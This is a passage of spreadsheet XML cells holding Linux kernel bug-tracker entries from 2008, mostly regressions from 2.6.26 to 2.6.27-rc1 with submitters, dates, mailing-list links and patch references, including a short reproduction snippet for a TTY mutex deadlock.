still can use the card with the driver found in http://rtl-wifi.sf.net, they have an improved (well, for me it's better) version of the driver that (as I can see) was merged into the kernel. I have been able to use WEP keys (my card doesn't support WPA) without a problem and had no sudden disconnects, the only missing feature for me is multicast support that looks like a placeholder in the source iirc. I'm using their latest svn right now: https://rtl-wifi.svn.sourceforge.net/svnroot/rtl-wifi So this report can be summarized in: 1. there's a problem with the card disconnecting randomly, apparently when someone ask it for it's state too much 2. the card doesn't work with WEP keys for me, only when I use the alternative driver WEP keys work. 3. if you can please check rtl-wifi and see if they have any modification you could use, it would be great to not have to build my own module for 2.6.27 too :). 4. please hack multicast support to the driver Thanks for your patience and hard work, let me know if I can help you with more info.</t>
  </si>
  <si>
    <t>Secondary hard drive fails during both hibernation and resume.</t>
  </si>
  <si>
    <t>2008-07-30 04:53 UTC</t>
  </si>
  <si>
    <t>Alan Jenkins</t>
  </si>
  <si>
    <t>2008-12-19 19:31 UTC</t>
  </si>
  <si>
    <t>11214 11232 11283</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: 2.6.27-rc1 Distribution: Ubuntu Hardy (8.04) Hardware Environment:Intel C2D. Two hard drives. Software Environment:64 bit kernel &amp; userspace. Problem Description: During hibernation I get errors on the second hard drive, including ata3 revalidation failed errno=-5 Hibernation continues anyway (the swap partition is on the first hard drive). I think these messages don't show up in dmesg afterwards because they happen too late in the hibernation process. I get much the same errors on resume as well, which do show up in dmesg. Steps to reproduce: Boot in "rescue mode" (didn't try init=/bin/bash) and use "echo disk &gt; /sys/power/state"</t>
  </si>
  <si>
    <t>commit a352def21a642133758b868c71bee12ab34ad5c5 broke pptp</t>
  </si>
  <si>
    <t>commit a352def21a642133758b868c71bee12ab34ad5c5</t>
  </si>
  <si>
    <t>2008-07-30 14:03 UTC</t>
  </si>
  <si>
    <t>2008-08-01 14:06 UTC</t>
  </si>
  <si>
    <t>Subject : commit a352def21a642133758b868c71bee12ab34ad5c5 broke pptp. Submitter : "Alexey Zaytsev" &lt;alexey.zaytsev@gmail.com&gt; Date : 2008-07-23 18:11 References : http://marc.info/?l=linux-kernel&amp;m=121683672229516&amp;w=4 Handled-By : "Alexey Zaytsev" &lt;alexey.zaytsev@gmail.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121744891810034&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Suspend to RAM regression (bisected)</t>
  </si>
  <si>
    <t>commit c0e09200dc0813972442e550a5905a132768e56c</t>
  </si>
  <si>
    <t>2008-07-31 05:09 UTC</t>
  </si>
  <si>
    <t>2008-07-31 05:48 UTC</t>
  </si>
  <si>
    <t>Subject : Suspend to RAM regression (bisected) Submitter : "Carlos R. Mafra" &lt;crmafra2@gmail.com&gt; Date : 2008-07-21 2:03 References : http://marc.info/?t=121660591100008&amp;r=1&amp;w=4 Handled-By : Linus Torvalds &lt;torvalds@linux-foundation.org&gt; Patch : http://marc.info/?l=linux-netdev&amp;m=121666039218078&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>CONFIG_MTD_NAND_AT91 instead of CONFIG_MTD_NAND_ATMEL in source files</t>
  </si>
  <si>
    <t>2008-07-31 05:20 UTC</t>
  </si>
  <si>
    <t>Guillaume GARDET</t>
  </si>
  <si>
    <t>2008-08-01 12:37 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.26 Earliest failing kernel version: 2.6.27-rc1 Distribution: from scratch Hardware Environment: arm at91sam9263 based board Software Environment: Problem Description: The management of the at91 nand have been modified. So in the menuconfig, CONFIG_MTD_NAND_AT91 became CONFIG_MTD_NAND_ATMEL but it has not been modified in the sources files like : arch/arm/mach-at91/at91cap9_devices.c arch/arm/mach-at91/at91sam9rl_devices.c arch/arm/mach-at91/at91rm9200_devices.c: arch/arm/mach-at91/at91sam9260_devices.c arch/arm/mach-at91/at91sam9261_devices.c arch/arm/mach-at91/at91sam9263_devices.c It is the same thing for CONFIG_MTD_NAND_AT91_MODULE and CONFIG_MTD_NAND_ATMEL_MODULE. So, the NAND will not be detected. Steps to reproduce: Compile your kernel with NAND flash enabled and your flash will not be detected.</t>
  </si>
  <si>
    <t>sky2 WOL broken</t>
  </si>
  <si>
    <t>2008-07-31 05:28 UTC</t>
  </si>
  <si>
    <t>2008-08-20 12:06 UTC</t>
  </si>
  <si>
    <t>Subject : Re: linux-next: Tree for July 18: sky2 WOL broken Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Date : 2008-07-20 0:20:10 References : http://marc.info/?l=linux-next&amp;m=121651311115104&amp;w=4 Handled-By : Stephen Hemminger &lt;shemminger@vyatta.com&gt; Patch : http://marc.info/?l=linux-netdev&amp;m=121694346401281&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[USB boot crash, -git] ecm_do_notify(), list_add corruption. prev-&gt;next should be next (ffff88003b8f82f8)</t>
  </si>
  <si>
    <t>2.6.26-tip-06162-g2ef4b1e-dirty</t>
  </si>
  <si>
    <t>2008-07-31 05:35 UTC</t>
  </si>
  <si>
    <t>2008-08-14 01:04 UTC</t>
  </si>
  <si>
    <t>Subject : [USB boot crash, -git] ecm_do_notify(), list_add corruption. prev-&gt;next should be next (ffff88003b8f82f8) Submitter : Ingo Molnar &lt;mingo@elte.hu&gt; Date : 2008-07-22 13:40 References : http://marc.info/?l=linux-usb&amp;m=121673409124827&amp;w=4 Handled-By : Alan Stern &lt;stern@rowland.harvard.edu&gt; Handled-By : David Brownell &lt;david-b@pacbell.net&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121708481823201&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>drivers/sh/maple/maple.c compile error</t>
  </si>
  <si>
    <t>Commit 306cfd630a4d121cf4e08b894d8b4c4cf106e57e</t>
  </si>
  <si>
    <t>2008-07-31 06:21 UTC</t>
  </si>
  <si>
    <t>2008-08-01 14:24 UTC</t>
  </si>
  <si>
    <t>Subject : drivers/sh/maple/maple.c compile error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; Date : 2008-07-28 22:20 References : http://lkml.org/lkml/2008/7/28/377 Handled-By : Paul Mundt &lt;lethal@linux-sh.org&gt; Handled-By : Adrian McMenamin &lt;adrian@newgolddream.dyndns.info&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Linux v2.6.27-rc1: fails to compile</t>
  </si>
  <si>
    <t>2008-07-31 06:41 UTC</t>
  </si>
  <si>
    <t>2008-08-01 14:15 UTC</t>
  </si>
  <si>
    <t>Subject : Linux v2.6.27-rc1: fails to compile Submitter : Grant Coady &lt;grant_lkml@dodo.com.au&gt; Date : 2008-07-29 22:03 References : http://marc.info/?l=linux-kernel&amp;m=121736912112440&amp;w=4 Handled-By : Frederik Deweerdt &lt;deweerdt@free.fr&gt; Patch : http://lkml.org/lkml/2008/7/29/48 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops in microcode sysfs registration</t>
  </si>
  <si>
    <t>2008-07-31 13:10 UTC</t>
  </si>
  <si>
    <t>2008-08-12 11:01 UTC</t>
  </si>
  <si>
    <t>Subject : Oops in microcode sysfs registration Submitter : Alistair John Strachan &lt;alistair@devzero.co.uk&gt; Date : 2008-07-29 13:57 References : http://marc.info/?t=121734004900002&amp;r=1&amp;w=4 Handled-By : "Dmitry Adamushko" &lt;dmitry.adamushko@gmail.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121741431005777&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Regression on ia64 with cpu masks: optimize and clean up cpumask_of_cpu()</t>
  </si>
  <si>
    <t>commit e56b3bc7942982ac2589c942fb345e38bc7a341a</t>
  </si>
  <si>
    <t>2008-07-31 13:38 UTC</t>
  </si>
  <si>
    <t>2008-07-31 13:47 UTC</t>
  </si>
  <si>
    <t>Subject : Regression on ia64 with cpu masks: optimize and clean up cpumask_of_cpu() Submitter : Simon Horman &lt;horms@verge.net.au&gt; Date : 2008-07-29 3:45 References : http://marc.info/?l=linux-kernel&amp;m=121730316501180&amp;w=4 Handled-By : Mike Travis &lt;travis@sgi.com&gt; Patch : http://marc.info/?l=linux-ia64&amp;m=121732506730101&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>commit a29ccf6f823a84d89e1c7aaaf221cf7282022024 break console on slackware 12.1</t>
  </si>
  <si>
    <t>2008-07-31 13:51 UTC</t>
  </si>
  <si>
    <t>2008-08-02 02:49 UTC</t>
  </si>
  <si>
    <t>Subject : commit a29ccf6f823a84d89e1c7aaaf221cf7282022024 break console on slackware 12.1 Submitter : "Marco Berizzi" &lt;pupilla@hotmail.com&gt; Date : 2008-07-29 15:42 References : http://marc.info/?l=linux-kernel&amp;m=121734650905579&amp;w=4 Handled-By : Tim Bird &lt;tim.bird@am.sony.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121744891610016&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>kernel BUG at arch/x86/kernel/io_apic_64.c:357!</t>
  </si>
  <si>
    <t>2008-07-31 13:57 UTC</t>
  </si>
  <si>
    <t>2008-08-12 11:05 UTC</t>
  </si>
  <si>
    <t>Subject : kernel BUG at arch/x86/kernel/io_apic_64.c:357! Submitter : Dhaval Giani &lt;dhaval@linux.vnet.ibm.com&gt; Date : 2008-07-29 16:21 References : http://marc.info/?l=linux-kernel&amp;m=121734804508255&amp;w=4 Handled-By : "Yinghai Lu" &lt;yhlu.kernel@gmail.com&gt; Handled-By : "Eric W. Biederman" &lt;ebiederm@xmission.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121735924628623&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc1 oops on boot -- cs423x?</t>
  </si>
  <si>
    <t>2008-07-31 14:02 UTC</t>
  </si>
  <si>
    <t>2008-08-01 13:51 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc1 oops on boot -- cs423x? Submitter : Pete Clements &lt;clem@clem.clem-digital.net&gt; Date : 2008-07-29 20:52 References : http://marc.info/?l=linux-kernel&amp;m=121736480005656&amp;w=4 Handled-By : Bjorn Helgaas &lt;bjorn.helgaas@hp.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121739048805724&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Commit 76a2a6ee8a0660a29127f05989ac59ae1ce865fa breaks PXA270 (at least)?</t>
  </si>
  <si>
    <t>Commit 76a2a6ee8a0660a29127f05989ac59ae1ce865fa</t>
  </si>
  <si>
    <t>2008-07-31 14:11 UTC</t>
  </si>
  <si>
    <t>2008-08-12 11:06 UTC</t>
  </si>
  <si>
    <t>Subject : Fwd: Commit 76a2a6ee8a0660a29127f05989ac59ae1ce865fa breaks PXA270 (at least)? Submitter : Russell King - ARM Linux &lt;linux@arm.linux.org.uk&gt; Date : 2008-07-29 22:31 References : http://marc.info/?l=linux-kernel&amp;m=121737075314966&amp;w=4 Handled-By : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>x86: 2.6.27-rc1 does not build with gcc-3.2.3 any more</t>
  </si>
  <si>
    <t>2008-07-31 14:19 UTC</t>
  </si>
  <si>
    <t>2008-08-17 03:23 UTC</t>
  </si>
  <si>
    <t>Subject : x86: 2.6.27-rc1 does not build with gcc-3.2.3 any more Submitter : Mikael Pettersson &lt;mikpe@it.uu.se&gt; Date : 2008-07-30 11:02 References : http://marc.info/?l=linux-kernel&amp;m=121741584608240&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc1 + selinux new options = no httpd</t>
  </si>
  <si>
    <t>2008-07-31 14:23 UTC</t>
  </si>
  <si>
    <t>2008-08-01 13:29 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc1 + selinux new options = no httpd Submitter : Gene Heskett &lt;gene.heskett@gmail.com&gt; Date : 2008-07-31 2:54 References : http://marc.info/?l=linux-kernel&amp;m=121747333012971&amp;w=4 Handled-By : James Morris &lt;jmorris@namei.org&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>VolanoMark regression with 2.6.27-rc1</t>
  </si>
  <si>
    <t>2008-07-31 14:26 UTC</t>
  </si>
  <si>
    <t>2008-12-13 10:50 UTC</t>
  </si>
  <si>
    <t>Subject : VolanoMark regression with 2.6.27-rc1 Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2008-07-31 3:20 References : http://marc.info/?l=linux-kernel&amp;m=121747464114335&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Bug in 2b2a1ff64afbadac842bbc58c5166962cf4f7664 ?</t>
  </si>
  <si>
    <t>commit 2b2a1ff64afbadac842bbc58c5166962cf4f7664</t>
  </si>
  <si>
    <t>2008-07-31 14:33 UTC</t>
  </si>
  <si>
    <t>2008-08-01 14:08 UTC</t>
  </si>
  <si>
    <t>Subject : Bug in 2b2a1ff64afbadac842bbc58c5166962cf4f7664 ? Submitter : "Serge E. Hallyn" &lt;serue@us.ibm.com&gt; Date : 2008-07-31 14:36 References : http://marc.info/?l=linux-kernel&amp;m=121751515009921&amp;w=4 Handled-By : Roland McGrath &lt;roland@redhat.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121749514307879&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc1 process time accounting</t>
  </si>
  <si>
    <t>2008-07-31 14:36 UTC</t>
  </si>
  <si>
    <t>2008-11-16 10:03 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc1 process time accounting Submitter : Lukas Hejtmanek &lt;xhejtman@ics.muni.cz&gt; Date : 2008-07-31 10:43 References : http://marc.info/?l=linux-kernel&amp;m=121750102917490&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc1: WARNING: at /home/rafael/src/linux-next/include/linux/blkdev.h:447</t>
  </si>
  <si>
    <t>2008-07-31 15:07 UTC</t>
  </si>
  <si>
    <t>2008-08-01 14:28 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc1: WARNING: at /home/rafael/src/linux-next/include/linux/blkdev.h:447 Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Date : 2008-08-01 00:03 References : http://lkml.org/lkml/2008/7/31/109 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>PROBLEM: abituguru3 module does not recognize my ip35 pro since 2.6.26</t>
  </si>
  <si>
    <t>2008-08-01 00:52 UTC</t>
  </si>
  <si>
    <t>Alain Cabiran</t>
  </si>
  <si>
    <t>2008-08-02 09:23 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.26 Distribution: Debian lenny Hardware Environment: ABit IP35-pro Bios rev 16 (2008-march-18) Software Environment: Linux 2.6.26 #2 SMP i686 abituguru3 is the first module loaded on boot (added in /etc/modules) Problem Description: uguru3 is not recognized on boot since i upgraded to kernel 2.6.26 but it works after force. Steps to reproduce: $ modprobe abituguru3 ; dmesg | tail -1 abituguru3: no Abit uGuru3 found, data = 0x00, cmd = 0x4C $ modprobe abituguru3 ; dmesg | tail -2 abituguru3: Assuming Abit uGuru3 is present because of "force" parameter abituguru3: found Abit uGuru3, motherboard ID: 001A (Abit IP35 Pro) $ rmmod abituguru3 $ modprobe abituguru3 ; dmesg | tail -1 abituguru3: found Abit uGuru3, motherboard ID: 001A (Abit IP35 Pro)</t>
  </si>
  <si>
    <t>sh O= builds broken</t>
  </si>
  <si>
    <t>2.6.27-rc1-git</t>
  </si>
  <si>
    <t>2008-08-01 14:31 UTC</t>
  </si>
  <si>
    <t>2008-08-05 00:46 UTC</t>
  </si>
  <si>
    <t>Subject : sh O= builds broken Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/8/1/426</t>
  </si>
  <si>
    <t>Kernel WARNING: at net/core/dev.c:1330 __netif_schedule+0x2c/0x98()</t>
  </si>
  <si>
    <t>2.6.26-Linus-git-05752-g93ded9b</t>
  </si>
  <si>
    <t>2008-08-01 14:34 UTC</t>
  </si>
  <si>
    <t>2008-08-01 14:42 UTC</t>
  </si>
  <si>
    <t>Subject : Kernel WARNING: at net/core/dev.c:1330 __netif_schedule+0x2c/0x98() Submitter : Larry Finger &lt;Larry.Finger@lwfinger.net&gt; Date : 2008-07-22 11:39 References : http://lkml.org/lkml/2008/7/22/330 Handled-By : David Miller &lt;davem@davemloft.net&gt; Handled-By : Jarek Poplawski &lt;jarkao2@gmail.com&gt; Handled-By : Nick Piggin &lt;nickpiggin@yahoo.com.au&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>drivers/serial/crisv10.c build error</t>
  </si>
  <si>
    <t>2008-08-01 14:48 UTC</t>
  </si>
  <si>
    <t>2008-08-05 00:45 UTC</t>
  </si>
  <si>
    <t>Subject : drivers/serial/crisv10.c build error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/8/1/431</t>
  </si>
  <si>
    <t>KVM modules break emergency reboot</t>
  </si>
  <si>
    <t>2008-08-01 14:56 UTC</t>
  </si>
  <si>
    <t>2012-05-22 13:09 UTC</t>
  </si>
  <si>
    <t>Subject : Re: Sysrq+B doesn't work on my box Submitter : "Zdenek Kabelac" &lt;zdenek.kabelac@gmail.com&gt; Date : 2008-08-01 20:25 References : http://marc.info/?l=linux-kernel&amp;m=121762241105336&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27-rc1 oops when plugging USB disk</t>
  </si>
  <si>
    <t>2008-08-01 15:11 UTC</t>
  </si>
  <si>
    <t>2008-08-14 09:17 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.27-rc1 oops when plugging USB disk Submitter : Lukas Hejtmanek &lt;xhejtman@ics.muni.cz&gt; Date : 2008-08-01 13:35 References : http://marc.info/?l=linux-kernel&amp;m=121759786223716&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>build issue #540 for v2.6.27-rc1 :'ipv4_route_path' undeclared</t>
  </si>
  <si>
    <t>2008-08-01 15:14 UTC</t>
  </si>
  <si>
    <t>2008-08-01 15:19 UTC</t>
  </si>
  <si>
    <t>Subject : build issue #540 for v2.6.27-rc1 :'ipv4_route_path' undeclared Submitter : Toralf Förster &lt;toralf.foerster@gmx.de&gt; Date : 2008-08-01 14:33 References : http://marc.info/?l=linux-kernel&amp;m=121760130830668&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>sh: fix LIBGCC</t>
  </si>
  <si>
    <t>2008-08-01 15:16 UTC</t>
  </si>
  <si>
    <t>Subject : sh: fix LIBGCC Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/8/1/446 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/8/1/446</t>
  </si>
  <si>
    <t>Only three cores found on quad-core machine.</t>
  </si>
  <si>
    <t>2008-08-01 15:18 UTC</t>
  </si>
  <si>
    <t>2008-10-10 12:34 UTC</t>
  </si>
  <si>
    <t>Subject : Only three cores found on quad-core machine. Submitter : Dave Jones &lt;davej@redhat.com&gt; Date : 2008-08-01 18:15 References : http://marc.info/?l=linux-kernel&amp;m=121761475224719&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>mtdsuper.c BLOCK=n compile error</t>
  </si>
  <si>
    <t>2008-08-01 15:33 UTC</t>
  </si>
  <si>
    <t>2008-08-04 11:05 UTC</t>
  </si>
  <si>
    <t>Subject : mtdsuper.c BLOCK=n compile error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/8/1/454</t>
  </si>
  <si>
    <t>BUG on booting 2.6.27-rc1</t>
  </si>
  <si>
    <t>2008-08-02 10:05 UTC</t>
  </si>
  <si>
    <t>2008-08-06 09:10 UTC</t>
  </si>
  <si>
    <t>Subject : BUG on booting 2.6.27-rc1 Submitter : Steve Wise &lt;swise@opengridcomputing.com&gt; Date : 2008-08-01 20:56 References : http://marc.info/?l=linux-kernel&amp;m=121762419708424&amp;w=4 Handled-By : Jeremy Fitzhardinge &lt;jeremy@goop.org&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121762583111470&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>p54usb broken by commit b19fa1f</t>
  </si>
  <si>
    <t>2008-08-02 10:09 UTC</t>
  </si>
  <si>
    <t>2008-08-20 12:12 UTC</t>
  </si>
  <si>
    <t>Subject : p54usb broken by commit b19fa1f Submitter : Larry Finger &lt;Larry.Finger@lwfinger.net&gt; Date : 2008-08-02 3:06 References : http://marc.info/?l=linux-kernel&amp;m=121764647801783&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Kconfig no longer outputs a .config with freshly updated defconfigs</t>
  </si>
  <si>
    <t>2008-08-02 10:15 UTC</t>
  </si>
  <si>
    <t>2008-10-06 08:56 UTC</t>
  </si>
  <si>
    <t>Subject : Kconfig no longer outputs a .config with freshly updated defconfigs Submitter : Josh Boyer &lt;jwboyer@linux.vnet.ibm.com&gt; Date : 2008-08-02 16:03 References : http://marc.info/?l=linux-kernel&amp;m=121769306319391&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2008-08-02 11:18 UTC</t>
  </si>
  <si>
    <t>Subject : serial/bfin_5xx.c build error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/8/2/116</t>
  </si>
  <si>
    <t>kernel is deadlocked due to tty-&gt;termios_mutex locked twice in one procedure</t>
  </si>
  <si>
    <t>2008-08-02 12:07 UTC</t>
  </si>
  <si>
    <t>kouyu</t>
  </si>
  <si>
    <t>2008-09-16 08:44 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.25 Earliest failing kernel version:2.6.26 Distribution:Gentoo Hardware Environment: Software Environment: Problem Description: Function tiocswinsz in drivers/char/tty_io.c calls mutex_lock(&amp;tty-&gt;termios_mutex), then tiocswinsz calls vc_lock_resize with tty-&gt;driver_data as first argument when tty-&gt;termios_mutex is locking. The latter(vc_lock_resize in drivers/char/vt.c) then calls vc_resize which calls mutex_lock(&amp;vc-&gt;vc_tty-&gt;termios_mutex). vc is its first argument which is tty-&gt;driver_data. vc-&gt;vc_tty is the tty of tty-&gt;driver_data, is also the tty of tty-&gt;termios_mutex locked in tiocswinsz. So the procedure is like this: tiocswinsz locks a mutex, and then calls another function(vc_resize finally), the latter locks the same mutex, and, oops, kernel is deadlocked then! I saw the code vt.c under version 2.6.25, there was no mutex_lock(&amp;vc-&gt;vc_tty-&gt;termios_mutex) in vc_resize. This is new in 2.6.26. Steps to reproduce: int fd = open ("/dev/tty0", O_RDWR); strunct winsize ws; ws.ws_col = col; /*different from current col*/ ws.ws_row = row; /*different from current row*/ ioctl(fd, TIOCSWINSZ, &amp;ws);</t>
  </si>
  <si>
    <t>acer-wmi broken in latest git kernel on TravelMate 6492 (Insufficient arguments - method [WQAA])</t>
  </si>
  <si>
    <t>commit f3454ae8104efb2dbf0d08ec42c6f5d0fe9225bc</t>
  </si>
  <si>
    <t>2008-08-02 12:10 UTC</t>
  </si>
  <si>
    <t>2008-08-16 12:27 UTC</t>
  </si>
  <si>
    <t>Carlos Corbacho</t>
  </si>
  <si>
    <t>Subject : acer-wmi broken in latest git kernel on TravelMate 6492 (Insufficient arguments - method [WQAA]) Submitter : Sven Wegener &lt;sven.wegener@stealer.net&gt; Date : 2008-08-02 15:50:54 References : http://marc.info/?l=linux-kernel&amp;m=121769235318600&amp;w=4 Handled-By : Carlos Corbacho &lt;carlos@strangeworlds.co.uk&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121769591723088&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>corrupt PMD after resume</t>
  </si>
  <si>
    <t>2008-08-02 14:04 UTC</t>
  </si>
  <si>
    <t>2008-12-20 04:02 UTC</t>
  </si>
  <si>
    <t>Subject : [BUG] 2.6.27-rc1 in ext3_find_entry Submitter : Alan Jenkins &lt;alan-jenkins@tuffmail.co.uk&gt; Date : 2008-08-02 9:51 References : http://marc.info/?l=linux-kernel&amp;m=121767073424952&amp;w=4 Handled-By : Hugh Dickins &lt;hugh@veritas.com&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Regression with handling the DEL key on Thinkpad X31</t>
  </si>
  <si>
    <t>2008-08-03 14:10 UTC</t>
  </si>
  <si>
    <t>Moritz Mühlenhoff</t>
  </si>
  <si>
    <t>2008-10-02 23:53 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.10 Earliest failing kernel version: 2.6.26 Distribution: Debian unstable Hardware Environment: IBM Thinkpad X31 Software Environment: Debian unstable Problem Description: I'm running my system without X11 in a fbcon console. Since the update to 2.6.26 the INSERT key is no longer working properly. It seems to lead to a very strange internal "lock": If INSERT is pressed, the arrow keys are no longer accepted. If I press INSERT again, the arrow keys work again. This bug is fairly annoying. In X11 the INSERT key is handled properly. 2.6.25 works just fine. Steps to reproduce: Run elinks with an arbitary web site; scroll a few lines up with the INSERT key.</t>
  </si>
  <si>
    <t>Current git fails to compile (gcc 3.4.4)</t>
  </si>
  <si>
    <t>commit d8d5900ef8afc562088f8470feeaf17c4747790f</t>
  </si>
  <si>
    <t>2008-08-03 14:36 UTC</t>
  </si>
  <si>
    <t>2008-08-12 11:09 UTC</t>
  </si>
  <si>
    <t>Subject : Current git fails to compile Submitter : Dhaval Giani &lt;dhaval@linux.vnet.ibm.com&gt; Date : 2008-07-18 7:55 References : http://marc.info/?l=linux-kernel&amp;m=121636772226303&amp;w=4 Handled-By : Jeremy Fitzhardinge &lt;jeremy@goop.org&gt; This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>oops in rt_cache_invalidate (2.6.27-rc1-2b12a4c)</t>
  </si>
  <si>
    <t>2.6.27-rc1-2b12a4c</t>
  </si>
  <si>
    <t>2008-08-03 14:48 UTC</t>
  </si>
  <si>
    <t>2008-08-06 05:28 UTC</t>
  </si>
  <si>
    <t>Subject : oops in rt_cache_invalidate (2.6.27-rc1-2b12a4c) Submitter : Marcin Slusarz &lt;marcin.slusarz@gmail.com&gt; Date : 2008-08-03 17:02 References : http://marc.info/?l=linux-kernel&amp;m=121778302016450&amp;w=4 Handled-By : Sven Wegener &lt;sven.wegener@stealer.net&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121779482531865&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>savagefb: garbled display using fbi</t>
  </si>
  <si>
    <t>2008-08-04 07:17 UTC</t>
  </si>
  <si>
    <t>2012-05-22 13:10 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: unknown Earliest failing kernel version: 2.6.25 Distribution: Ubuntu (hardy, now intrepid) Hardware Environment: Thinkpad T23 Problem Description: When displaying pictures in fbi, I get coloured vertical lines instead of the image display. Using different bpp values does not fix the display. Using uvesafb gives a fine display. Steps to reproduce: Run fbi on a jpg picture.</t>
  </si>
  <si>
    <t>TC HTB hanging problem</t>
  </si>
  <si>
    <t>2.6.23 and 2.6.25</t>
  </si>
  <si>
    <t>2008-08-04 08:01 UTC</t>
  </si>
  <si>
    <t>Leandro Silva</t>
  </si>
  <si>
    <t>2008-09-26 05:13 UTC</t>
  </si>
  <si>
